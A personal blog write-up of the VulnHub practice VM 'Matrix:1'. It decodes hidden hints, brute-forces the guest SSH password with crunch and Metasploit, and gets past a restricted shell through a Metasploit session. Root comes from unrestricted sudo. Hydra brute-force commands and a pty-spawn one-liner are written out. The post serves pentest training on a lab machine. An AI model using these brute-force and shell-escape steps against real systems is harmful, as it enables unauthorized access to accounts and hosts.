5 December 2022

Pentesting Fun Stuff

following the cyber security path…

Matrix

It has been a long time since I did a boot-2-root box from vulnhub.com.
If you don’t know the site and you’re interested learning pentesting skills or honing your skills, this is the right spot.
There are numerous of VM’s with different levels and most of them have a theme, which can be great fun.
When sites like hackthebox.eu weren’t there, this was the place to be for learning the right skills.
I have chosen to do ‘Matrix:1’ (link), created by Ajay Verma.
The level should be medium level and the goal is to get root and read /root/flag.txt.
As for hints…….follow your intuitions … and enumerate!
Let’s get cracking!

Enumeration

For my initial enumeration I use a tool called Red Team Kit (RTK), which has a automated recon scanner.
It does the port scanning and from the results will give some suggestions.

██████╗ ███████╗██████╗     ████████╗███████╗ █████╗ ███╗   ███╗    ██╗  ██╗██╗████████╗
██╔══██╗██╔════╝██╔══██╗    ╚══██╔══╝██╔════╝██╔══██╗████╗ ████║    ██║ ██╔╝██║╚══██╔══╝
██████╔╝█████╗  ██║  ██║       ██║   █████╗  ███████║██╔████╔██║    █████╔╝ ██║   ██║
██╔══██╗██╔══╝  ██║  ██║       ██║   ██╔══╝  ██╔══██║██║╚██╔╝██║    ██╔═██╗ ██║   ██║
██║  ██║███████╗██████╔╝       ██║   ███████╗██║  ██║██║ ╚═╝ ██║    ██║  ██╗██║   ██║
╚═╝  ╚═╝╚══════╝╚═════╝        ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝    ╚═╝  ╚═╝╚═╝   ╚═╝
Created by n0w4n
[-] Do you want to save the reports? (y/n) y
[-] Give path for saving the reports (example: /root/rtk/reports/): /root/vulnhub/matrix
[-] What is the IP address of the target? 192.168.100.139
[*] Checking connection to target
[*] Connection to 192.168.100.139 established
[*] Starting a Masscan to find open ports on the target
[*] This can take some time as this is for TCP and UDP
[*] Parsing output and loading up for further analysis
[*] Starting a TCP nmap scan on the target with acquired ports to retrieve all information
[*] This can take some time
[*] There are no open UDP ports
[*] Creating report
#############################################################################################
[*] Found the following open ports and services on the target:
22	tcp	  ssh OpenSSH 7.7 (protocol 2.0)
80	tcp	  http SimpleHTTPServer 0.6 (Python 2.7.14)
31337	tcp	  http SimpleHTTPServer 0.6 (Python 2.7.14)
#############################################################################################
[*] The following recommendations can be made:
[*] SSH
    Try bruteforcing with the commands:
      1.) hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.100.139 -t 4 ssh
      2.) hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 192.168.100.139 -t 4 ssh
      (If nothing else works - try this as a last resort)
[*] WEB
    To enumerate the directories run the command:
      1.) python3 <path to dirsearch>/dirsearch.py -u 192.168.100.139 -e php -r -f -x 400,403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
back to (m)ain menu or (e)xit this program?

It looks like there is a webserver listening on 2 ports and a SSH server on the default port.

Webserver

While starting DirSearch in the background, I open my browser to check out port 80 first.

Welcome in the Matrix!
When looking at the source code there is a picture to be found:

<div class="service"><img src="assets/img/p0rt_31337.png"/ width="15">

A white rabbit to be more precise.
The name of the picture is the hint, but that port I already got from the port scan.
Port 31337 is my next port to visit with my browser.

In the source code there is another hint…..this time in the form of a base64 encode comment:

<!--p class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=</p-->
								</div><!-- End / service -->

Let’s decode it.

root@kali:~/vulnhub/matrix# echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

It looks like a Linux command where a string is echoed and redirected into a file called Cypher.matrix.
When directing my browser to http://192.168.100.139:31337/Cypher.matrix I get to download a file.
Let’s check out what it is:

root@kali:~/vulnhub/matrix# file Cypher.matrix
Cypher.matrix: ASCII text
root@kali:~/vulnhub/matrix# cat Cypher.matrix
+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++
[->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---<
]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++
+[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- -----
-.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> -----
-.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+
+++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++
.<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++
+++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<]
>++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.-
--.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++
++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->-
----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++
+.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+
++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[->
---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----.
<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--.
--.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++
+[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+
+.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
+.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++
+++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[->
----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++<
]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++<
]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+
+++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++<
]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[->
---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++
+++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++
[->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[->
----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[-
>---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.<
+++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++
+++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-.
<++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<]
>--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[->
+++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->--
----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[-
>---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]>
+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<
]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----
.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[
->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.
<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++
+[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>
----- ---.- --.<

This can be confusing if you see it for the first time, but if you have seen it before it is quit simple.
It is a esoteric programming language called Brainfuck. Brainfuck was designed for extreme minimalism and leads to obfuscated code, with programs containing only eight distinct characters.
There are numerous online decoders, I use https://www.splitbrain.org/_static/ook/ for the decoding part.

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

Nice…..but there is a catch. I need to figure out the last characters to get it to work.
As for options I can try and brute force it, but mainly I try to use brute force as a last resort.
On Kali there a some password lists, so maybe it’s inside of one of the lists.

root@kali:/usr/share/wordlists# grep -r . -e "k1ll0r*"
./rockyou.txt:k1ll0watt
./rockyou.txt:k1ll0187
./seclists/Passwords/Leaked-Databases/md5decryptor.uk.txt:k1ll0rd1e

Not really what I’m looking for as it doesn’t have 2 chars after the r, but three.
Let’s just try it and then brute forcing it with a loop.

root@kali:/usr/share/wordlists# ssh guest@192.168.100.139
The authenticity of host '192.168.100.139 (192.168.100.139)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.100.139' (ECDSA) to the list of known hosts.
guest@192.168.100.139's password:
Permission denied, please try again.

Nope…..let’s turn to crunch.

SSH

Crunch is a tool to create wordlists. It is quit handy and easy to use.
Because I already have a part of the password and I know I’m missing two characters the syntax will be like this:

root@kali:~/vulnhub/matrix# crunch 8 8 -t k1ll0r%@ -o passlist.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output

There are different ways to use the list and brute force SSH. I go for the SSH scanner from Metasploit.

[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7i'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7j'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7k'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7l'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7m'
[+] 192.168.100.139:22 - Success: 'guest:k1ll0r7n' 'uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare) Linux porteus 4.16.3-porteus #1 SMP PREEMPT Sat Apr 21 12:42:52 Local time zone must be set-- x86_64 Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz GenuineIntel GNU/Linux '
[*] Command shell session 1 opened (192.168.100.137:44711 -> 192.168.100.139:22) at 2019-02-13 21:32:26 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) >

That one worked.

root@kali:/usr/share/wordlists# ssh guest@192.168.100.139
guest@192.168.100.139's password:
Last login: Mon Aug  6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$

I’m in…now to do some recon on the system.

guest@porteus:~$ id
-rbash: id: command not found

Dang…..looks like I entered into a restricted bash shell.
To get out of this restricted shell I need to know with what I can work with.

guest@porteus:~$ echo $PATH
/home/guest/prog
guest@porteus:~$ echo $SHELL
/bin/rbash

To find out what commands I can use I double tab

guest@porteus:~$
!          ]]         builtin    compgen    declare    echo       eval       fc         getopts    in         ll         mc         pwd        select     suspend    trap       umask      wait
./         alias      caller     complete   dirs       elif       exec       fg         hash       jobs       local      mcedit     read       set        test       true       unalias    while
:          bg         case       compopt    disown     else       exit       fi         help       kill       logout     popd       readarray  shift      then       type       unset      {
[          bind       cd         continue   do         enable     export     for        history    la         ls         printf     readonly   shopt      time       typeset    until      }
[[         break      command    coproc     done       esac       false      function   if         let        mapfile    pushd      return     source     times      ulimit     vi

I can try and find the thing I need to break free……..or I can hit up msfconsole again and do the ssh scanner again.

[*] Command shell session 1 opened (192.168.100.137:32967 -> 192.168.100.139:22) at 2019-02-13 21:47:17 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
  Id  Name  Type         Information                              Connection
  --  ----  ----         -----------                              ----------
  1         shell linux  SSH guest:k1ll0r7n (192.168.100.139:22)  192.168.100.137:32967 -> 192.168.100.139:22 (192.168.100.139)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
id
uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare)

As you can see I’m not bothered with the restricted shell. Much better.
Now to get a proper TTY shell.

python -c 'import pty;pty.spawn("/bin/bash");'
guest@porteus:~$ id
id
uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare)

Much better.

guest@porteus:~$ sudo -l
sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp

Ok….so normally I would check out the (root) and the (trinity) part of the sudo permission.
But in this case I can do everything as root with sudo….no strings attached.

guest@porteus:~$ sudo ls -lah /root
sudo ls -lah /root
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
Password: k1ll0r7n
total 74K
drwx------ 16 root root 4.0K Aug 14  2018 .
drwxr-xr-x 51 root root 4.0K Aug  6  2018 ..
-rw-------  1 root root   52 Aug 14  2018 .Xauthority
-rw-------  1 root root 6.1K Aug 14  2018 .bash_history
-rw-r--r--  1 root root   79 Mar  5  2017 .bash_profile
-rw-r--r--  1 root root 1.2K Apr 22  2018 .bashrc
drwx------  5 root root 4.0K Aug  6  2018 .cache
drwxr-xr-x 21 root root 4.0K Aug 13  2018 .config
drwx------  3 root root 4.0K Aug  6  2018 .dbus
-rw-------  1 root root   16 Aug  6  2018 .esd_auth
drwx------  4 root root 4.0K Aug  6  2018 .thumbnails
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Desktop
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Documents
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Downloads
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Music
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Pictures
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Public
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Videos
-rw-r--r--  1 root root  691 Aug 14  2018 flag.txt
guest@porteus:~$ sudo cat /root/flag.txt
sudo cat /root/flag.txt
   _,-.
,-'  _|                  EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._              INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_.           IN THE MATRIX AND BEAT OFF
|`-._`-.\,-'_|  _,-'.
     `-.|.-' | |`.-'|_     WHAT
        |      |_|,-'_`.
              |-._,-'  |     NO, ME NEITHER
         jrei | |    _,'
              '-|_,-'          IT'S JUST A HYPOTHETICAL QUESTION
guest@porteus:~$

And there you have it. I don’t know if this was the intended way of the creator, but hey!….whatever gets it to work.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.